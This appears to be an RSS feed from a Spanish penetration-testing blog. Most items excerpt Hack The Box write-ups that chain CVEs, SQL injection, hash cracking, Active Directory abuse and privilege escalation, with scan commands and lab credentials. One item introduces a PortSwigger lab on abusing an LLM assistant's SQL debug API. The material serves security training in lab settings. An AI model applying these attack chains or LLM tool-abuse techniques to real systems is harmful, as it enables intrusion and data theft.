<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Posts on Hackpuntes</title><link>https://hackpuntes.com/es/posts/</link><description>Recent content in Posts on Hackpuntes</description><generator>Hugo -- gohugo.io</generator><language>es-es</language><lastBuildDate>Sat, 23 Aug 2087 00:00:00 +0000</lastBuildDate><atom:link href="https://hackpuntes.com/es/posts/index.xml" rel="self" type="application/rss+xml"/><item><title>Logging WriteUp</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/logging-writeup/</link><pubDate>Sat, 18 Jul 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/logging-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hackthebox/machines/logging/logging-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hackthebox/machines/logging/logging-banner.webp" alt="Logging WriteUp" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Logging&lt;/strong&gt; es una máquina de dificultad &lt;code&gt;🟧 Media&lt;/code&gt; de &lt;strong&gt;Hack The Box&lt;/strong&gt;, y es de esas de Active Directory en las que vas encadenando un fallo detrás de otro hasta quedarte con todo el dominio. Empezamos leyendo una contraseña en texto plano que alguien dejó tirada en un log, abusamos de permisos sobre una cuenta gMSA para sacar su hash, saltamos a otro usuario con un DLL hijacking en una tarea programada, y para el final nos pedimos un certificado de ADCS por ESC1 y suplantamos un servidor WSUS para ejecutar código como SYSTEM en el Domain Controller. Suena a mucho, pero lo vamos a ir viendo con calma y por partes.&lt;/p&gt;</description></item><item><title>CCTV WriteUp</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/cctv-writeup/</link><pubDate>Sat, 11 Jul 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/cctv-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hackthebox/machines/cctv/cctv-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hackthebox/machines/cctv/cctv-banner.webp" alt="CCTV WriteUp" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CCTV&lt;/strong&gt; es una máquina de dificultad &lt;code&gt;🟩 Easy&lt;/code&gt; de la plataforma &lt;strong&gt;Hack The Box&lt;/strong&gt;. Combina la explotación de una SQL Injection en &lt;strong&gt;ZoneMinder&lt;/strong&gt; para obtener credenciales de un usuario SSH, con el descubrimiento de servicios internos de video-vigilancia tras pivotar desde la máquina comprometida. La escalada a root se consigue a través de un RCE autenticado en &lt;strong&gt;motionEye&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="-cadena-de-ataque"&gt;🗺️ Cadena de Ataque&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;Nmap → Puerto 80 (ZoneMinder 1.37.63)
│
▼
Credenciales por defecto admin:admin → acceso al panel
│
▼
CVE-2024-51482 (Boolean SQLi) → sqlmap → mark:opensesame
│
▼
SSH como mark
│
▼
LinPEAS → tcpdump (cap_net_raw) + puertos internos
│
▼
Port Forwarding → motionEye 0.43.1b4 en :8765
│
▼
/etc/motioneye/motion.conf → admin:989c5a8ee87a0e9521ec81a79187d162109282f0
│
▼
CVE-2025-60787 (Metasploit RCE) → root 🏴
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id="-reconocimiento"&gt;🔍 Reconocimiento&lt;/h2&gt;
&lt;h3 id="escaneo-de-puertos"&gt;Escaneo de Puertos&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;10.129.15.204 cctv.htb&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; sudo tee -a /etc/hosts
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sudo nmap -p- --open -Pn --min-rate &lt;span class="m"&gt;5000&lt;/span&gt; -oA ports -vvv cctv.htb
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;grep -oP &lt;span class="s1"&gt;&amp;#39;\d+/open&amp;#39;&lt;/span&gt; ports.gnmap &lt;span class="p"&gt;|&lt;/span&gt; cut -d&lt;span class="s1"&gt;&amp;#39;/&amp;#39;&lt;/span&gt; -f1 &lt;span class="p"&gt;|&lt;/span&gt; sort -u &lt;span class="p"&gt;|&lt;/span&gt; tr &lt;span class="s1"&gt;&amp;#39;\n&amp;#39;&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;,&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; sed &lt;span class="s1"&gt;&amp;#39;s/,$//&amp;#39;&lt;/span&gt; &amp;gt; ports.txt
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sudo nmap -sCV -p&lt;span class="k"&gt;$(&lt;/span&gt;cat ports.txt&lt;span class="k"&gt;)&lt;/span&gt; -Pn -oA scan -vvv cctv.htb
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Puerto&lt;/th&gt;
&lt;th&gt;Servicio&lt;/th&gt;
&lt;th&gt;Detalle&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;22&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;SSH&lt;/td&gt;
&lt;td&gt;OpenSSH 9.6p1 Ubuntu&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;80&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;HTTP&lt;/td&gt;
&lt;td&gt;Apache 2.4.58 → &lt;code&gt;SecureVision CCTV&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;La superficie de ataque es pequeña. El puerto 22 no es vulnerable, así que nos centramos en el 80.&lt;/p&gt;</description></item><item><title>DevArea WriteUp</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/devarea-writeup/</link><pubDate>Sat, 04 Jul 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/devarea-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hackthebox/machines/devarea/devarea-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hackthebox/machines/devarea/devarea-banner.webp" alt="DevArea WriteUp" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;DevArea&lt;/strong&gt; es una máquina de dificultad &lt;code&gt;🟧 Media&lt;/code&gt; de la plataforma &lt;strong&gt;Hack The Box&lt;/strong&gt;, corresponde a la &lt;strong&gt;Season 10&lt;/strong&gt; y ha sido creada por &lt;strong&gt;EmSec&lt;/strong&gt;. Simula un entorno de desarrollo con múltiples servicios expuestos, un servicio web SOAP sobre Apache CXF/Jetty, un servidor FTP con acceso anónimo y una plataforma de virtualización de servicios Hoverfly. El objetivo es encadenar una vulnerabilidad de lectura de ficheros con abuso de API para obtener acceso inicial, y después explotar una misconfiguración crítica en el binario bash del sistema para escalar a root.&lt;/p&gt;</description></item><item><title>WingData WriteUp</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/wingdata-writeup/</link><pubDate>Sat, 27 Jun 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/wingdata-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hackthebox/machines/wingdata/wingdata-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hackthebox/machines/wingdata/wingdata-banner.webp" alt="WingData WriteUp" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;WingData&lt;/strong&gt; es una máquina de dificultad &lt;code&gt;🟩 Fácil&lt;/code&gt; de la plataforma &lt;strong&gt;Hack The Box&lt;/strong&gt;, Season 10, creada por &lt;strong&gt;WackyH4cker&lt;/strong&gt;. La cadena de ataque combina la explotación de un &lt;strong&gt;Wing FTP Server vulnerable&lt;/strong&gt; para obtener acceso inicial, extracción y crackeo de credenciales desde ficheros de configuración, y escalada de privilegios mediante una vulnerabilidad en el módulo &lt;code&gt;tarfile&lt;/code&gt; de Python.&lt;/p&gt;
&lt;h2 id="-cadena-de-ataque"&gt;🗺️ Cadena de Ataque&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;Reconocimiento → Puerto 80 + 22
│
▼
Enumeración web → ftp.wingdata.htb (Wing FTP Server v7.4.3)
│
▼
CVE-2025-47812 → RCE sin autenticación → Shell como wingftp
│
▼
/opt/wftpserver/Data/1/users/wacky.xml → Hash SHA-256 con sal
│
▼
Hashcat (modo 1410) → Contraseña en texto claro → SSH como wacky
│
▼
sudo -l → restore_backup_clients.py (root) → CVE-2025-4517
│
▼
Tar malicioso → path traversal → /etc/sudoers → root 🏴
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id="-reconocimiento"&gt;🔍 Reconocimiento&lt;/h2&gt;
&lt;h3 id="configuración-de-etchosts"&gt;Configuración de /etc/hosts&lt;/h3&gt;
&lt;p&gt;Antes de empezar, añadimos la IP de la máquina al fichero &lt;code&gt;/etc/hosts&lt;/code&gt; para poder usar el nombre de dominio en todas las herramientas:&lt;/p&gt;</description></item><item><title>NanoCorp WriteUp</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/nanocorp-writeup/</link><pubDate>Sat, 20 Jun 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/nanocorp-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hackthebox/machines/nanocorp/nanocorp-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hackthebox/machines/nanocorp/nanocorp-banner.webp" alt="NanoCorp WriteUp" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;NanoCorp&lt;/strong&gt; es una máquina de dificultad &lt;code&gt;🟥 Hard&lt;/code&gt; de la plataforma &lt;strong&gt;Hack The Box&lt;/strong&gt;. La cadena de ataque empieza en un portal de empleo que acepta CVs en ZIP: empaquetando un fichero &lt;code&gt;.library-ms&lt;/code&gt; malicioso (CVE-2025-24071) conseguimos que el servidor, al extraerlo, intente autenticarse por SMB contra nuestra máquina, filtrando el hash NetNTLMv2 de una cuenta de servicio. Tras crackear esa contraseña, usamos &lt;strong&gt;BloodHound&lt;/strong&gt; para mapear el dominio y descubrimos una cadena de abuso de DACLs que nos permite unirnos a un grupo privilegiado y resetear la contraseña de otra cuenta de servicio con acceso WinRM. La escalada final explota &lt;strong&gt;CVE-2024-0670&lt;/strong&gt; en el agente de monitorización &lt;strong&gt;Checkmk&lt;/strong&gt;, abusando de la reparación de su instalador MSI para ejecutar nuestro propio script como &lt;code&gt;NT AUTHORITY\SYSTEM&lt;/code&gt;.&lt;/p&gt;</description></item><item><title>VariaType WriteUp</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/variatype-writeup/</link><pubDate>Sat, 13 Jun 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/variatype-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hackthebox/machines/variatype/variatype-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hackthebox/machines/variatype/variatype-banner.webp" alt="VariaType WriteUp" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;VariaType&lt;/strong&gt; es una máquina de dificultad &lt;code&gt;🟧 Media&lt;/code&gt; de la plataforma &lt;strong&gt;Hack The Box&lt;/strong&gt;, Season 10. La cadena de ataque pasa por descubrir un repositorio Git expuesto en un portal interno, extraer credenciales del historial de commits, explotar una escritura arbitraria de ficheros en &lt;strong&gt;fontTools&lt;/strong&gt; para obtener una shell, moverse lateralmente abusando de la inyección de comandos en &lt;strong&gt;FontForge&lt;/strong&gt; mediante un archivo ZIP malicioso, y escalar a root aprovechando un path traversal en &lt;strong&gt;setuptools&lt;/strong&gt; a través de una regla &lt;code&gt;sudo&lt;/code&gt; mal configurada.&lt;/p&gt;</description></item><item><title>Facts WriteUp</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/facts-writeup/</link><pubDate>Sat, 06 Jun 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/facts-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hackthebox/machines/facts/facts-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hackthebox/machines/facts/facts-banner.webp" alt="Facts WriteUp" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Facts&lt;/strong&gt; es una máquina de dificultad &lt;code&gt;🟩 Easy&lt;/code&gt; de la plataforma &lt;strong&gt;Hack The Box&lt;/strong&gt;. Combina la explotación de un CMS web con una fuga de credenciales hacia un servidor de almacenamiento &lt;strong&gt;MinIO&lt;/strong&gt; compatible con la API S3, del que extraemos una clave privada SSH protegida por contraseña. La escalada de privilegios se consigue abusando de un binario permitido en &lt;code&gt;sudo&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="-cadena-de-ataque"&gt;🗺️ Cadena de Ataque&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;Nmap → Puerto 80 (CamaleonCMS 2.9.0) + Puerto 54321 (MinIO)
│
▼
CVE-2025-2304 → Privilege Escalation + S3 Config Leak
│
▼
Credenciales MinIO → Bucket &amp;#34;internal&amp;#34;
│
▼
.ssh/id_ed25519 (clave privada cifrada)
│
▼
ssh2john + john → passphrase: dragonballz → usuario: trivia
│
▼
sudo /usr/bin/facter → custom fact (.rb) → /bin/bash como root 🏴
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id="-reconocimiento"&gt;🔍 Reconocimiento&lt;/h2&gt;
&lt;h3 id="escaneo-de-puertos"&gt;Escaneo de Puertos&lt;/h3&gt;
&lt;p&gt;Hacemos el reconocimiento en &lt;strong&gt;dos fases&lt;/strong&gt;: descubrimiento rápido y luego detección de versiones sobre los puertos encontrados.&lt;/p&gt;</description></item><item><title>Interpreter WriteUp</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/interpreter-writeup/</link><pubDate>Sat, 30 May 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/interpreter-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hackthebox/machines/interpreter/interpreter-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hackthebox/machines/interpreter/interpreter-banner.webp" alt="Interpreter WriteUp" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Interpreter&lt;/strong&gt; es una máquina de dificultad &lt;code&gt;🟨 Media&lt;/code&gt; de la plataforma &lt;strong&gt;Hack The Box&lt;/strong&gt;, Season 10. La cadena de ataque combina la explotación de &lt;strong&gt;Mirth Connect 4.4.0&lt;/strong&gt; mediante deserialización Java insegura para obtener RCE sin autenticación, extracción de credenciales desde la base de datos interna, crackeo de un hash PBKDF2-HMAC-SHA256 y escalada de privilegios abusando de un servicio Flask con inyección en f-strings de Python.&lt;/p&gt;
&lt;h2 id="-cadena-de-ataque"&gt;🗺️ Cadena de Ataque&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;Reconocimiento → Puertos 22, 80, 443
│
▼
Enumeración web → Mirth Connect 4.4.0 (via JNLP)
│
▼
CVE-2023-43208 → Deserialización Java insegura → RCE como mirth
│
▼
/usr/local/mirthconnect/conf/mirth.properties → Credenciales BD
│
▼
MariaDB (mc_bdd_prod) → Hash PBKDF2-HMAC-SHA256 de sedric
│
▼
Hashcat (modo 10900) → snowflake1 → SSH como sedric
│
▼
/usr/local/bin/notif.py → Flask + eval() en f-strings → SSTI
│
▼
SUID bash → root 🏴
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id="-reconocimiento"&gt;🔍 Reconocimiento&lt;/h2&gt;
&lt;h3 id="configuración-de-etchosts"&gt;Configuración de /etc/hosts&lt;/h3&gt;
&lt;p&gt;Antes de empezar, añadimos la IP de la máquina al fichero &lt;code&gt;/etc/hosts&lt;/code&gt;:&lt;/p&gt;</description></item><item><title>MonitorsFour WriteUp</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/monitorsfour-writeup/</link><pubDate>Sat, 23 May 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/monitorsfour-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hackthebox/machines/monitorsfour/monitorsfour-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hackthebox/machines/monitorsfour/monitorsfour-banner.webp" alt="MonitorsFour WriteUp" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MonitorsFour&lt;/strong&gt; es una máquina de dificultad &lt;code&gt;🟩 Fácil&lt;/code&gt; de la plataforma &lt;strong&gt;Hack The Box&lt;/strong&gt;. La cadena de ataque comienza explotando un endpoint con IDOR y comparación laxa de PHP para filtrar credenciales de administrador, continúa con ejecución remota de código en &lt;strong&gt;Cacti 1.2.28&lt;/strong&gt; mediante &lt;strong&gt;CVE-2025-24367&lt;/strong&gt; y concluye escapando del contenedor Docker abusando de la &lt;strong&gt;API del daemon&lt;/strong&gt; expuesta sin autenticación en la subred interna de Docker Desktop (&lt;strong&gt;CVE-2025-9074&lt;/strong&gt;).&lt;/p&gt;</description></item><item><title>Pterodactyl WriteUp</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/pterodactyl-writeup/</link><pubDate>Sat, 16 May 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/pterodactyl-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hackthebox/machines/pterodactyl/pterodactyl-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hackthebox/machines/pterodactyl/pterodactyl-banner.webp" alt="Pterodactyl WriteUp" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Pterodactyl&lt;/strong&gt; es una máquina de dificultad &lt;code&gt;🟧 Medium&lt;/code&gt; de la plataforma &lt;strong&gt;Hack The Box&lt;/strong&gt;, correspondiente a la Season 10 (semana 2). El nombre no es casual, el vector principal es &lt;strong&gt;Pterodactyl Panel&lt;/strong&gt;, un gestor de servidores de juego open-source ampliamente desplegado en Internet. La cadena de ataque combina un &lt;strong&gt;path traversal no autenticado&lt;/strong&gt; que expone PEAR y permite RCE, seguido de extracción de credenciales de base de datos, crackeo de hash bcrypt para pivotar a un usuario con SSH, y escalada a root encadenando &lt;strong&gt;CVE-2025-6018&lt;/strong&gt; (PAM) con &lt;strong&gt;CVE-2025-6019&lt;/strong&gt; (udisks2/libblockdev).&lt;/p&gt;</description></item><item><title>Overwatch WriteUp</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/overwatch-writeup/</link><pubDate>Sat, 09 May 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/overwatch-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hackthebox/machines/overwatch/overwatch-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hackthebox/machines/overwatch/overwatch-banner.webp" alt="Overwatch WriteUp" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Overwatch&lt;/strong&gt; es una máquina de dificultad &lt;code&gt;🟧 Media&lt;/code&gt; de la plataforma &lt;strong&gt;Hack The Box&lt;/strong&gt;. La cadena de ataque pasa por enumerar un share SMB accesible sin autenticación para obtener un binario .NET con credenciales embebidas, conectarse a un servidor MSSQL en puerto no estándar para descubrir un linked server mal configurado, envenenar el DNS del dominio (ADIDNS) para interceptar el hash NTLMv2 de una cuenta de servicio, acceder vía WinRM y escalar privilegios abusando de un servicio WCF interno con inyección de comandos en el método &lt;code&gt;KillProcess&lt;/code&gt;.&lt;/p&gt;</description></item><item><title>Fridagate - Herramienta Android para gestionar Frida e interceptar tráfico con Burp Suite</title><link>https://hackpuntes.com/es/posts/fridagate-android-pentesting-tool/</link><pubDate>Wed, 15 Apr 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/fridagate-android-pentesting-tool/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/fridagate-android-pentesting-tool/fridagate-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/fridagate-android-pentesting-tool/fridagate-banner.webp" alt="Fridagate - Herramienta Android para gestionar Frida e interceptar tráfico con Burp Suite" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Fridagate&lt;/strong&gt; es una aplicación Android open source diseñada para &lt;strong&gt;pentesters de aplicaciones móviles&lt;/strong&gt;. Permite gestionar &lt;strong&gt;frida-server&lt;/strong&gt;, interceptar tráfico HTTPS con &lt;strong&gt;Burp Suite&lt;/strong&gt; e inyectar scripts de bypass directamente desde el dispositivo, sin necesidad de ejecutar comandos manualmente en cada sesión de auditoría.&lt;/p&gt;
&lt;p&gt;El proyecto nació de una necesidad real: durante una auditoría de apps Android el flujo habitual implica conectar por ADB, subir frida-server, darle permisos, arrancarlo, configurar el proxy del sistema, añadir reglas iptables&amp;hellip; Fridagate automatiza todo eso desde una interfaz limpia en el propio teléfono.&lt;/p&gt;</description></item><item><title>DarkZero WriteUp</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/darkzero-writeup/</link><pubDate>Sat, 04 Apr 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/darkzero-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hackthebox/machines/darkzero/darkzero-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hackthebox/machines/darkzero/darkzero-banner.webp" alt="DarkZero WriteUp" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;DarkZero&lt;/strong&gt; es una máquina de dificultad &lt;code&gt;🟥 Hard&lt;/code&gt; de la plataforma &lt;strong&gt;Hack The Box&lt;/strong&gt; que modela un entorno de Active Directory empresarial con &lt;strong&gt;dos dominios separados&lt;/strong&gt;, multihoming y vectores de ataque avanzados. El objetivo final es comprometer completamente ambos Domain Controllers.&lt;/p&gt;
&lt;p&gt;Al empezar, nos proporcionan unas credenciales iniciales: 🔑 &lt;code&gt;john.w:RFulUtONCOL!&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="-cadena-de-ataque"&gt;🗺️ Cadena de Ataque&lt;/h2&gt;
&lt;p&gt;Antes de entrar en detalle, aquí el resumen de la cadena completa:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;Credenciales john.w
│
▼
MSSQL DC01 (guest) ──linked server──► MSSQL DC02 (sysadmin)
│
▼
xp_cmdshell ► Shell como svc_sql en DC02 (172.16.20.2)
│
▼
Ligolo-MP ► Acceso a red interna 172.16.20.0/24
│
▼
AD CS (Certify) ► Hash NTLM de svc_sql ► Cambio de contraseña
│
▼
RunasCs (LogonType 5) ► SeImpersonatePrivilege
│
▼
SigmaPotato ► NT AUTHORITY\SYSTEM en DC02
│
▼
Rubeus monitor + xp_dirtree ► TGT de DC01$
│
▼
Pass-the-Ticket ► secretsdump ► Hash Administrator DC01
│
▼
evil-winrm ► Administrator en DC01 🏴
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id="-reconocimiento"&gt;🔍 Reconocimiento&lt;/h2&gt;
&lt;h3 id="escaneo-de-puertos"&gt;Escaneo de Puertos&lt;/h3&gt;
&lt;p&gt;Hacemos el reconocimiento en &lt;strong&gt;dos fases&lt;/strong&gt;, primero descubrimos los puertos abiertos de forma rápida y luego lanzamos los scripts de detección sobre ellos.&lt;/p&gt;</description></item><item><title>PortSwigger Labs - Exploiting LLM APIs with Excessive Agency</title><link>https://hackpuntes.com/es/posts/portswigger/web-security/llm-attacks/lab-exploiting-llm-apis-with-excessive-agency/</link><pubDate>Mon, 09 Mar 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/portswigger/web-security/llm-attacks/lab-exploiting-llm-apis-with-excessive-agency/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/portswigger/web-security/llm-attacks/lab-exploiting-llm-apis-with-excessive-agency/lab-exploiting-llm-apis-with-excessive-agency-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/portswigger/web-security/llm-attacks/lab-exploiting-llm-apis-with-excessive-agency/lab-exploiting-llm-apis-with-excessive-agency-banner.webp" alt="PortSwigger Labs - Exploiting LLM APIs with Excessive Agency" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Estás auditando una aplicación web que integra un &lt;strong&gt;Large Language Model (LLM)&lt;/strong&gt; como asistente de soporte al cliente. A simple vista parece inofensivo, el usuario pregunta, el modelo responde. Pero debajo de esa interfaz de chat se esconde algo mucho más peligroso, &lt;strong&gt;el LLM tiene acceso&lt;/strong&gt; directo a una API de depuración que ejecuta &lt;strong&gt;comandos SQL arbitrarios&lt;/strong&gt; sobre la base de datos de producción.&lt;/p&gt;</description></item><item><title>Solucionando el Error de Kerberos KRB_AP_ERR_SKEW</title><link>https://hackpuntes.com/es/posts/fixing-krb-ap-err-skew-kerberos-clock-skew/</link><pubDate>Tue, 03 Mar 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/fixing-krb-ap-err-skew-kerberos-clock-skew/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/fixing-krb-ap-err-skew-kerberos-clock-skew/fixing-krb-ap-err-skew-kerberos-clock-skew-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/fixing-krb-ap-err-skew-kerberos-clock-skew/fixing-krb-ap-err-skew-kerberos-clock-skew-banner.webp" alt="Solucionando el Error de Kerberos KRB_AP_ERR_SKEW" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Estás en pleno ejercicio de intrusión, has logrado comprometer una plantilla de certificados vulnerable en Active Directory Certificate Services (ADCS) y ya tienes en tu poder el preciado archivo &lt;code&gt;administrator.pfx&lt;/code&gt;. El siguiente paso lógico es solicitar un &lt;strong&gt;Ticket Granting Ticket (TGT)&lt;/strong&gt; y extraer el hash del administrador. Lanzas &lt;code&gt;certipy-ad&lt;/code&gt; con una sonrisa en la cara y, de repente, la terminal te escupe esto:&lt;/p&gt;</description></item><item><title>Firmado de IPAs con Sideloadly</title><link>https://hackpuntes.com/es/posts/ios-ipa-signing-sideloadly/</link><pubDate>Sat, 13 Dec 2025 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/ios-ipa-signing-sideloadly/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/ios_ipa_signing_sideloadly/ios_ipa_signing_sideloadly_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/ios_ipa_signing_sideloadly/ios_ipa_signing_sideloadly_banner.webp" alt="Firmado de IPAs con Sideloadly" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;En el ecosistema cerrado de Apple, la ejecución de código arbitrario es el primer muro con el que nos topamos. Históricamente, dependíamos del &lt;strong&gt;jailbreak&lt;/strong&gt; para auditar aplicaciones, pero en entornos corporativos o con dispositivos de última generación (donde un jailbreak estable puede no existir), necesitamos adaptarnos.&lt;/p&gt;
&lt;p&gt;Aquí es donde entra el concepto de &lt;strong&gt;Sideloading&lt;/strong&gt;. Básicamente, abusamos de la funcionalidad de &lt;strong&gt;Free Developer Account&lt;/strong&gt; de Apple para firmar nuestras propias aplicaciones (o aplicaciones de terceros modificadas) y desplegarlas en el dispositivo objetivo. Aunque existen herramientas como AltStore, hoy nos centraremos en &lt;strong&gt;Sideloadly&lt;/strong&gt;, una navaja suiza que no solo firma, sino que facilita la inyección de librerías dinámicas (&lt;code&gt;.dylib&lt;/code&gt; / Frida Gadgets) al vuelo.&lt;/p&gt;</description></item><item><title>Androdialer Writeup</title><link>https://hackpuntes.com/es/posts/8ksec/android/androdialer-writeup/</link><pubDate>Mon, 08 Dec 2025 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/8ksec/android/androdialer-writeup/</guid><description>&lt;h1 id="androdialer-la-experiencia-telefónica-definitiva"&gt;AndroDialer: la experiencia telefónica definitiva&lt;/h1&gt;
&lt;h2 id="introducción"&gt;Introducción&lt;/h2&gt;
&lt;p&gt;¿Alguna vez has querido librarte de las limitaciones del marcador habitual de tu Android? &lt;strong&gt;&lt;em&gt;¡Te presentamos AndroDialer!&lt;/em&gt;&lt;/strong&gt; Una app de marcado elegante y completa que lleva tus llamadas al siguiente nivel.&lt;/p&gt;
